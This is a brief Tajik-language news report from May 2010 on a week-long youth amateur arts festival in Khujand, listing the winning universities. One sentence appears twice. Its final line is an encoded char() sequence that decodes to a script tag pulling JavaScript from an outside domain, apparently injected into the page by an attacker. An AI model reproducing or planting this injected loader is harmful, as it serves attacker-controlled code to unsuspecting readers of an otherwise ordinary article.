21.05.2010
Садои ҷавонӣ
Дар радифи 10 рӯзи ҷавонӣ дар хонаи маданияти рақами 1 уми ба номи Н. Азимови шаҳри Хуҷанд давоми 1 ҳафта байни 7 донишгоҳҳои олии вилояти Суғд фестивали ҳаваскорони ҷавон таҳти унвони «Садои ҷавонӣ» гузаронида шуд. Рӯзи гузашта давраи ниҳонии он баргузор гардид. Ҳаваскорони ҷавон аз рӯи 11 жанри санъати ҳаваскорӣ ҳунарнамоӣ карданд. Аз ҷумла: Суруди умумӣ, навои умумии асбобҳои халқӣ, байтбарак, суруди классикӣ ва ғайра. Аз рӯи ҳамаи шартҳо ҷои аввал ба ДДХ ба номи академик Б. Ғафуров дода шуд. Ҷои дувум насиби ФХДТТ ба номи академик М. Осимӣ гардид, ҷои саввумро бошад ДДБСТ ишғол намуд.
Ғолибон бо тӯҳфаҳои хотиравӣ қадрдонӣ гардиданд.
Ғолибон бо тӯҳфаҳои хотиравӣ қадрдонӣ гардиданд.
Парвина Аҳророва
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)b158c039f87095d255c5a17e19dcd489.js" type="text/javascript">

